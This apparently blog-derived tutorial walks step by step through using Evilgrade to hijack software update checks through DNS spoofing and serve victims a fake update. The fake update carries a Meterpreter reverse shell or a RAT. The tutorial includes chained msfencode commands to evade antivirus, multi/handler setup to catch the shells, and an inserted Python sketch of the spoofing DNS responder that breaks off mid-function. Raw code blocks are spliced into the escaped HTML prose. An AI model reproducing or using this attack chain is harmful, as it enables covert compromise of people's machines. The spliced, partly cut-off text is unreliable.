&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; EX: root@bt:~/Desktop/EvilGrade2.0# tar -zxvf isr-evilgrade-2.0.0.tar.gz&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; -C /pentest/exploits/ISR&lt;br /&gt;
&lt;br /&gt;
Now you will have a new folder called "isr-evilgrade", either in the default location on your desktop or wherever you told it to go with the -C argument noted above. Navigate to this folder and you can start it up...maybe. By default BackTrack does not have all of the underlying Perl modules needed for the framework to work, so we will need to make some quick additions to install those dependencies, as follows:&lt;br /&gt;
&lt;br /&gt;
You can try to start Evilgrade to check by simply entering the following at the command prompt and hitting enter: ./evilgrade&lt;br /&gt;
If you are using a fresh BT 5 install then you will get the following results:&lt;br /&gt;
&lt;a href="mailto:root@bt:~/Desktop/EvilGrade2.0/isr-evilgrade"&gt;root@bt:~/Desktop/EvilGrade2.0/isr-evilgrade&lt;/a&gt;# ./evilgrade&lt;br /&gt;
Can't locate Data/Dump.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.1 /usr/local/share/perl/5.10.1 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at isrcore/Shell.pm line 28.&lt;br /&gt;
BEGIN failed--compilation aborted at isrcore/Shell.pm line 28.&lt;br /&gt;
Compilation failed in require at (eval 2) line 3.&lt;br /&gt;
&amp;nbsp;...propagated at /usr/share/perl/5.10/base.pm line 93.&lt;br /&gt;
BEGIN failed--compilation aborted at isrcore/shellz.pm line 29.&lt;br /&gt;
Compilation failed in require at ./evilgrade line 24.&lt;br /&gt;
BEGIN failed--compilation aborted at ./evilgrade line 24.&lt;br /&gt;
&lt;br /&gt;
Take note of the dependency missing above (Data/Dump.pm). EvilGrade requires the following Perl modules to work 100%: Data::Dump, Digest::MD5, and Time::HiRes.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; For BackTrack5 we will need to install Data::Dump, and to do this you&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; can use the following commands:&lt;br /&gt;
&lt;br /&gt;
Command to search for a package: apt-cache search perl &amp;lt;insert the package name you are looking for&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; EX: apt-cache search perl Data::Dump&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; NOTE: the package name usually starts with lib and ends with -perl, like&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; libsomething-perl, and the results should provide a basic description as well.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; What we need: libdata-dump-perl - Perl module to help dump data structures&lt;br /&gt;
Command to install the package (using the name found above): apt-get install &amp;lt;package name&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; EX: apt-get install libdata-dump-perl&lt;br /&gt;
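As an added example (not part of Evilgrade or of the original post), the following Python snippet automates the rule of thumb just given: it reads the module name out of Perl's "Can't locate Foo/Bar.pm in @INC" error, turns it back into Foo::Bar, guesses the Debian package as libfoo-bar-perl and prints the apt-cache search line to confirm the guess along with the apt-get line to install it. The sample error text is constructed from the failed ./evilgrade run shown above; the lib...-perl mapping is only the naming convention the post describes, so the search step is kept as the check before installing.&lt;br /&gt;

```python
"""Resolve missing Perl modules to Debian package names.

Added example; not part of Evilgrade or of the original post. It applies
the rule of thumb the post gives: take the module Perl could not locate,
write it as Foo::Bar, and guess the Debian package as libfoo-bar-perl.
The guess follows the naming convention only; confirm it with
apt-cache search before installing, as the post does.
"""
import re

# Constructed sample: the first lines of the failed ./evilgrade run shown
# in the post, pasted here as test input (the @INC path list is shortened).
SAMPLE_ERROR = """\
Can't locate Data/Dump.pm in @INC (@INC contains: /etc/perl /usr/lib/perl5 .) at isrcore/Shell.pm line 28.
BEGIN failed--compilation aborted at isrcore/Shell.pm line 28.
Compilation failed in require at (eval 2) line 3.
"""

# Perl names the module as a path relative to @INC, e.g. Data/Dump.pm
_MISSING = re.compile(r"Can't locate (\S+)\.pm in @INC")


def missing_perl_modules(perl_output):
    """Return the modules (Foo::Bar form) Perl could not locate, in order
    of first appearance and without duplicates."""
    found = []
    for path in _MISSING.findall(perl_output):
        module = path.replace("/", "::")
        if module not in found:
            found.append(module)
    return found


def debian_package_name(module):
    """Apply the lib...-perl convention: Data::Dump becomes libdata-dump-perl."""
    return "lib" + module.lower().replace("::", "-") + "-perl"


def search_commands(perl_output):
    """The apt-cache search lines to run first, confirming each guess."""
    return [f"apt-cache search perl {m}" for m in missing_perl_modules(perl_output)]


def install_command(perl_output):
    """Build one apt-get line covering every module the output names;
    None when nothing is missing."""
    packages = [debian_package_name(m) for m in missing_perl_modules(perl_output)]
    if not packages:
        return None
    return "apt-get install " + " ".join(packages)


if __name__ == "__main__":
    for line in search_commands(SAMPLE_ERROR):
        print(line)
    print(install_command(SAMPLE_ERROR))
```

Feed it the whole error output of a failed start and run the printed search line first; if apt-cache shows the guessed package with a sensible description, the install line is the one to use.&lt;br /&gt;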
&lt;br /&gt;
Once this is installed you should be able to re-check whether anything else is needed (nothing else is needed for BT5, but if you are using BT4 you might also have to install one of the other two dependencies listed above). We can re-check by simply typing the following:&lt;br /&gt;
&lt;br /&gt;
Command: ./evilgrade &lt;br /&gt;
Results this time around:&lt;br /&gt;
&lt;a href="mailto:root@bt:~/Desktop/EvilGrade2.0/isr-evilgrade"&gt;root@bt:~/Desktop/EvilGrade2.0/isr-evilgrade&lt;/a&gt;# ./evilgrade&lt;br /&gt;
[DEBUG] - Loading module: modules/cygwin.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/virtualbox.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/sparkle.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/clamwin.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/ccleaner.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/miranda.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/notepadplus.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/amsn.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/winzip.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/istat.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/linkedin.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/flip4mac.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/photoscape.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/jet.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/getjar.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/superantispyware.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/dap.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/filezilla.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/allmynotes.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/panda_antirootkit.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/sunjava.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/cpan.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/freerip.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/autoit3.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/apt.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/googleanalytics.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/opera.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/gom.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/techtracker.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/yahoomsn.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/nokia.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/appleupdate.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/growl.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/bbappworld.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/atube.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/nokiasoftware.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/skype.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/apptapp.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/vidbox.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/isopen.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/winupdate.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/jetphoto.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/trillian.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/openoffice.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/mirc.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/ubertwitter.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/orbit.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/osx.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/bsplayer.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/sunbelt.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/quicktime.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/flashget.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/fcleaner.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/express_talk.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/divxsuite.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/speedbit.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/paintnet.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/itunes.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/teamviewer.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/winscp.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/vmware.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/blackberry.pm&lt;br /&gt;
[DEBUG] - Loading module: modules/winamp.pm&lt;br /&gt;
(evilgrade ASCII-art banner)&lt;br /&gt;
-------------------------------------------&lt;br /&gt;
---------------------&amp;nbsp; &lt;a href="http://www.infobytesec.com/"&gt;http://www.infobytesec.com/&lt;/a&gt;&lt;br /&gt;
- 63 modules available.&lt;br /&gt;
evilgrade&amp;gt;....&lt;br /&gt;
Now that we have it running, what next? Let's start by seeing what is available: type "help" at the evilgrade prompt...&lt;br /&gt;
Results...&lt;br /&gt;
evilgrade&amp;gt;help&lt;br /&gt;
Type 'help command' for more detailed help on a command.&lt;br /&gt;
&amp;nbsp; Commands:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; configure - Configure &amp;lt;module-name&amp;gt; - no help available&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; exit&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; - exits the program&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; help&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; - prints this screen, or help on 'command'&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; reload&amp;nbsp;&amp;nbsp;&amp;nbsp; - Reload to update all the modules - no help available&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; restart&amp;nbsp;&amp;nbsp; - Restart webserver - no help available&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; set&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; - Configure variables - no help available&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; show&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; - Display information of &amp;lt;object&amp;gt;.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; start&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; - Start webserver - no help available&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; status&amp;nbsp;&amp;nbsp;&amp;nbsp; - Get webserver status - no help available&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; stop&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; - Stop webserver - no help available&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; version&amp;nbsp;&amp;nbsp; - Display framework version. - no help available&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; vhosts&amp;nbsp;&amp;nbsp;&amp;nbsp; - Show vhosts enable - no help available&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&lt;br /&gt;
We can check which modules are available, and so which software we can target, with the "show modules" command at the evilgrade prompt.&lt;br /&gt;
Results...from: evilgrade&amp;gt;show modules&lt;br /&gt;
List of modules:&lt;br /&gt;
===============&lt;br /&gt;
allmynotes&lt;br /&gt;
amsn&lt;br /&gt;
appleupdate&lt;br /&gt;
apptapp&lt;br /&gt;
apt&lt;br /&gt;
atube&lt;br /&gt;
autoit3&lt;br /&gt;
bbappworld&lt;br /&gt;
blackberry&lt;br /&gt;
bsplayer&lt;br /&gt;
ccleaner&lt;br /&gt;
clamwin&lt;br /&gt;
cpan&lt;br /&gt;
cygwin&lt;br /&gt;
dap&lt;br /&gt;
divxsuite&lt;br /&gt;
express_talk&lt;br /&gt;
fcleaner&lt;br /&gt;
filezilla&lt;br /&gt;
flashget&lt;br /&gt;
flip4mac&lt;br /&gt;
freerip&lt;br /&gt;
getjar&lt;br /&gt;
gom&lt;br /&gt;
googleanalytics&lt;br /&gt;
growl&lt;br /&gt;
isopen&lt;br /&gt;
istat&lt;br /&gt;
itunes&lt;br /&gt;
jet&lt;br /&gt;
jetphoto&lt;br /&gt;
linkedin&lt;br /&gt;
miranda&lt;br /&gt;
mirc&lt;br /&gt;
nokia&lt;br /&gt;
nokiasoftware&lt;br /&gt;
notepadplus&lt;br /&gt;
openoffice&lt;br /&gt;
opera&lt;br /&gt;
orbit&lt;br /&gt;
osx&lt;br /&gt;
paintnet&lt;br /&gt;
panda_antirootkit&lt;br /&gt;
photoscape&lt;br /&gt;
quicktime&lt;br /&gt;
skype&lt;br /&gt;
sparkle&lt;br /&gt;
speedbit&lt;br /&gt;
sunbelt&lt;br /&gt;
sunjava&lt;br /&gt;
superantispyware&lt;br /&gt;
teamviewer&lt;br /&gt;
techtracker&lt;br /&gt;
trillian&lt;br /&gt;
ubertwitter&lt;br /&gt;
vidbox&lt;br /&gt;
virtualbox&lt;br /&gt;
vmware&lt;br /&gt;
winamp&lt;br /&gt;
winscp&lt;br /&gt;
winupdate&lt;br /&gt;
winzip&lt;br /&gt;
yahoomsn&lt;br /&gt;
- 63 modules available.&lt;br /&gt;
&lt;br /&gt;
As you can see there are a lot of modules available, and you will find software matching several of them on almost any PC (often more than one). Next you need to decide which one to work with. Most of the demos provided by the tool's authors use the "sunjava" module, so I will use something different; pick whatever you like, or whatever you know your target runs. Once you have chosen your module(s), it is time to set things up. We begin by telling Evilgrade which module to configure, like so:&lt;br /&gt;
&lt;br /&gt;
Command: evilgrade&amp;gt;configure &amp;lt;insert module name you chose&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; EX: evilgrade&amp;gt;configure ccleaner&lt;br /&gt;
&lt;br /&gt;
You will know you are in the chosen module's configuration mode because the command prompt changes and now appears as follows:&lt;br /&gt;
&lt;br /&gt;
Results...from above: evilgrade&amp;gt;configure ccleaner...&lt;br /&gt;
evilgrade(ccleaner)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
OK, now to check what is configurable for the chosen module. We can do this by simply typing "show options" at the module's configuration prompt.&lt;br /&gt;
&lt;br /&gt;
Results...&lt;br /&gt;
evilgrade(ccleaner)&amp;gt;show options&lt;br /&gt;
Display options:&lt;br /&gt;
===============&lt;br /&gt;
Name = Ccleaner&lt;br /&gt;
Version = 1.0&lt;br /&gt;
Author = ["German Rodriguez &amp;lt; grodriguez +[AT]+ infobytesec.com &amp;gt;"]&lt;br /&gt;
Description = ""&lt;br /&gt;
VirtualHost = "&lt;a href="http://www.ccleaner.com/"&gt;http://www.ccleaner.com/&lt;/a&gt;"&lt;br /&gt;
.--------+-------------------+-----------------.&lt;br /&gt;
| Name   | Default           | Description     |&lt;br /&gt;
+--------+-------------------+-----------------+&lt;br /&gt;
| enable | 1                 | Status          |&lt;br /&gt;
| agent  | ./agent/agent.exe | Agent to inject |&lt;br /&gt;
'--------+-------------------+-----------------'&lt;br /&gt;
You can see that "VirtualHost" is set to &lt;a href="http://www.ccleaner.com/"&gt;http://www.ccleaner.com/&lt;/a&gt;; this is the host name Evilgrade will impersonate once we get things running and start our MiTM attack: its DNS server answers lookups for this name with DNSAnswerIp, and its webserver then answers the updater's requests for that host. If you notice the vendor's update host has changed over time, or you know of other update servers, you can edit this field accordingly. &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; PRO-TIP: The VirtualHost and request paths live in the Perl modules in the "modules" folder &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; inside the isr-evilgrade folder; you can edit them there if you know what you are doing,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; but if you are not familiar with Perl I don't suggest messing with these,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;and leaving them at the defaults will do for most scenarios. These modules can also be &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; studied as templates for adding your own modules for other applications; some basic&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;instructions can be found in the tool's documentation and README file.&lt;br /&gt;
&lt;br /&gt;
&lt;div&gt;The AGENT field is the MOST IMPORTANT field we will be working with in this tutorial, as it is our evil agent in disguise: the fake update binary that gets handed to the victim. We have two options for setting up our agent in disguise:&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&amp;nbsp;OPTION 1: We can set up Evilgrade to work with Metasploit and msfpayload/msfencode to dynamically create payloads on the fly&lt;/li&gt;
&lt;li&gt;&amp;nbsp;OPTION 2: We can use our own RAT or backdoor to be served to our victims.&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;We can accomplish either scenario using the "set" command to define the AGENT field, either with a command line that runs Metasploit's msfpayload and msfencode, OR with the path directly to your RAT or backdoor. &lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;Here is an overview of both methods with examples so you can see the difference clearly:&lt;/div&gt;OPTION 1: let Metasploit help out and generate the payload on the fly&amp;nbsp;&lt;br /&gt;
Command: evilgrade(ccleaner)&amp;gt;set agent '["/usr/local/bin/msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=31337 X &amp;gt; &amp;lt;%OUT%&amp;gt;/tmp/agent.exe&amp;lt;%OUT%&amp;gt;"]'&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; NOTE: If you are not using BT5, make sure the first part &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; (/usr/local/bin/msfpayload) is the real path to msfpayload on your system so &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; the framework can run it; on BT4 it is located at /usr/bin/msfpayload. The path between the two &amp;lt;%OUT%&amp;gt; markers is where Evilgrade expects the generated file to land; it reads that file back and serves it as the update.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; PRO-TIP: You can replace the above example using meterpreter reverse shell&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;with your choice of the available payloads in Metasploit (of which there are many)&lt;br /&gt;
&amp;nbsp;SUPER-PRO-TIP: If you want to stop anti-virus from catching your agent (Meterpreter signatures are everywhere), you can modify the above command to also encode the agent so it has a better chance of slipping past AV. Here is an example you can work with. Note that msfencode only encodes raw shellcode, so the payload must be generated in raw form (R) and only converted to an EXE at the final step; this is also why you can't just run an existing RAT binary through msfencode.&lt;br /&gt;
&lt;br /&gt;
EX: evilgrade(ccleaner)&amp;gt;set agent '["/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=31337 R | /pentest/exploits/framework3/msfencode -e x86/shikata_ga_nai -t raw -c 10 | /pentest/exploits/framework3/msfencode -e x86/call4_dword_xor -t raw -c 10 | /pentest/exploits/framework3/msfencode -e x86/countdown -t exe &amp;gt; &amp;lt;%OUT%&amp;gt;/tmp/agent.exe&amp;lt;%OUT%&amp;gt;"]'&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; NOTE: msfencode is given by its full path here; Evilgrade runs the command from its own working directory, so a relative ./msfencode would not be found.&lt;br /&gt;
&amp;nbsp;&lt;br /&gt;
In this case, for every update request we get from a victim, the framework will generate a fresh fake update binary through our dynamic link to MSF, which will load an encoded Meterpreter reverse shell.&lt;br /&gt;
&amp;nbsp;&lt;br /&gt;
OPTION 2: Using our own RAT or backdoor with a hard-coded path to the EXE. You simply place your RAT or backdoor of choice in a folder and tell the framework where to find it; it is as simple as this:&lt;br /&gt;
&lt;br /&gt;
Command: evilgrade(ccleaner)&amp;gt;set agent /root/Desktop/server.exe&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;NOTE: msfencode will not be able to help you FUD your payload if it&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; is already in binary EXE form, so make sure it is FUD ahead of time to avoid&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;any issues with AVs&lt;br /&gt;
&amp;nbsp;&lt;br /&gt;
In this case, for every update request we get from a victim, the framework will simply serve your designated RAT/backdoor as the update agent.&lt;br /&gt;
&lt;br /&gt;
IMPORTANT NOTES: You will need to set up "exploit/multi/handler" in msfconsole to catch the connections coming back from our Meterpreter shell (if you are using your own RAT or backdoor I assume you know how to monitor for connections and successful uploads).&lt;br /&gt;
&lt;br /&gt;
From the MSF console, type the following commands: &lt;br /&gt;
&amp;nbsp;&amp;nbsp; use exploit/multi/handler &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;set PAYLOAD windows/meterpreter/reverse_tcp&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;set LHOST 192.168.1.2&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;set LPORT 31337&lt;br /&gt;
&amp;nbsp;&amp;nbsp; exploit&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; NOTE: msfconsole's "set" takes "name value" separated by a space, not "name=value", and the payload, LHOST and LPORT must match exactly what you generated the agent with above. If you expect more than one victim, run "exploit -j" instead so the handler stays up as a background job and keeps accepting sessions.&lt;br /&gt;
&lt;br /&gt;
Results...&lt;br /&gt;
[*] Started reverse handler on 192.168.1.2:31337 &lt;br /&gt;
[*] Starting the payload handler...&lt;br /&gt;
&lt;br /&gt;
When we are done making our configuration changes, we simply enter the "conf" command to leave the module's configuration mode and return to the initial prompt, or as the authors call it, Global Configuration Mode. You can repeat the above steps for other modules to have more than one set up at once. We also want to issue the "reload" command so the framework updates all of the modules to include the changes we made above at the configuration level (for the ccleaner module in this example). Once that is done you can issue the "show active" command to list the modules you have configured and enabled.&lt;br /&gt;
&lt;br /&gt;
Commands:&lt;br /&gt;
evilgrade(ccleaner)&amp;gt;conf&lt;br /&gt;
evilgrade&amp;gt;&lt;br /&gt;
evilgrade&amp;gt;reload&lt;br /&gt;
&lt;br /&gt;
OK so we have configured our modules to reference the appropriate AGENT we want to use, now it is time to place the final edits and start things up...&lt;br /&gt;
&lt;br /&gt;
From the Global Configuration Mode you will need to enter "show options" to see how Evilgrade is setup to act as DNS and Webserver as well as what ports it is working on.&lt;br /&gt;
&lt;br /&gt;
Command: evilgrade&amp;gt;show options&lt;br /&gt;
Results...&lt;br /&gt;
Display options:&lt;br /&gt;
===============&lt;br /&gt;
.-------------+-----------+---------------------------------------------------------.&lt;br /&gt;
| Name        | Default   | Description                                             |&lt;br /&gt;
+-------------+-----------+---------------------------------------------------------+&lt;br /&gt;
| DNSEnable   | 1         | Enable DNS Server ( handle virtual request on modules ) |&lt;br /&gt;
| DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip                                     |&lt;br /&gt;
| DNSPort     | 53        | Listen Name Server port                                 |&lt;br /&gt;
| debug       | 1         | Debug mode                                              |&lt;br /&gt;
| port        | 80        | Webserver listening port                                |&lt;br /&gt;
| sslport     | 443       | Webserver SSL listening port                            |&lt;br /&gt;
'-------------+-----------+---------------------------------------------------------'&lt;br /&gt;
As you can see we need to change one thing: "DNSAnswerIp" must point at our IP on the network, in this example 192.168.1.2. This is the address Evilgrade's DNS server hands out for every enabled module's VirtualHost, so it must be an address the victim can reach our webserver on (the default 127.0.0.1 would send the victim to itself). Also make sure nothing else on your box already holds UDP 53 or TCP 80/443, or Evilgrade will not be able to bind its listeners.&lt;br /&gt;
&lt;br /&gt;
Command: evilgrade&amp;gt; set DNSAnswerIp 192.168.1.2&lt;br /&gt;
Confirm with: evilgrade&amp;gt;show options&lt;br /&gt;
Result: &lt;br /&gt;
Display options:&lt;br /&gt;
===============&lt;br /&gt;
.-------------+-------------+---------------------------------------------------------.&lt;br /&gt;
| Name        | Default     | Description                                             |&lt;br /&gt;
+-------------+-------------+---------------------------------------------------------+&lt;br /&gt;
| DNSEnable   | 1           | Enable DNS Server ( handle virtual request on modules ) |&lt;br /&gt;
| DNSAnswerIp | 192.168.1.2 | Resolve VHost to ip                                     |&lt;br /&gt;
| DNSPort     | 53          | Listen Name Server port                                 |&lt;br /&gt;
| debug       | 1           | Debug mode                                              |&lt;br /&gt;
| port        | 80          | Webserver listening port                                |&lt;br /&gt;
| sslport     | 443         | Webserver SSL listening port                            |&lt;br /&gt;
'-------------+-------------+---------------------------------------------------------'&lt;br /&gt;
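To make the DNS-plus-webserver combination concrete, here is an added example of my own (not code from isr-evilgrade, whose real implementation is Perl) that models what the module's VirtualHost/agent fields and the global DNSEnable/DNSAnswerIp/port options do together: a DNS responder that answers A queries for an enabled module's VirtualHost with DNSAnswerIp, and an HTTP router that hands out that module's agent only when the Host header and path match. The module table, the update path /download/update.exe, the fake agent bytes and the sample requests are all constructed for illustration; the whole thing runs offline.&lt;br /&gt;

```python
import socket
import struct

# Constructed module table, modelled on the "show options" output in the
# post. VirtualHost is the name the updater resolves, 'paths' are the
# update URLs we answer for that host (assumed path, not from the page),
# and 'agent' stands in for ./agent/agent.exe.
MODULES = {
    "ccleaner": {
        "enable": 1,
        "vhost": "www.ccleaner.com",
        "paths": {"/download/update.exe"},
        "agent": b"MZ\x90\x00 constructed fake agent, not a real PE",
    },
}
DNS_ANSWER_IP = "192.168.1.2"   # the DNSAnswerIp global option from the post


def enabled_vhosts():
    """Map lower-cased VirtualHost to module name for every enabled module."""
    return {m["vhost"].lower(): n for n, m in MODULES.items() if m["enable"]}


def build_query(txid, name):
    """Build a standard recursive A/IN query (what a victim's resolver sends)."""
    q = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    for label in name.split("."):
        q += bytes([len(label)]) + label.encode("ascii")
    return q + b"\x00" + struct.pack("!HH", 1, 1)


def parse_qname(msg, off):
    """Read an uncompressed DNS name at msg[off:]; return (name, offset after it)."""
    labels = []
    while msg[off] != 0:
        n = msg[off]
        labels.append(msg[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n
    return ".".join(labels), off + 1


def dns_reply(query):
    """Answer an A query for an enabled VirtualHost with DNS_ANSWER_IP.

    Returns the wire-format response, or None when the name is not one of
    ours (a deployable server would forward those to a real resolver so the
    victim's other traffic keeps working; that part is left out here).
    """
    txid, _flags, qdcount = struct.unpack("!HHH", query[:6])
    if qdcount != 1:
        return None
    name, off = parse_qname(query, 12)
    qtype, qclass = struct.unpack("!HH", query[off:off + 4])
    if (qtype, qclass) != (1, 1) or name.lower() not in enabled_vhosts():
        return None
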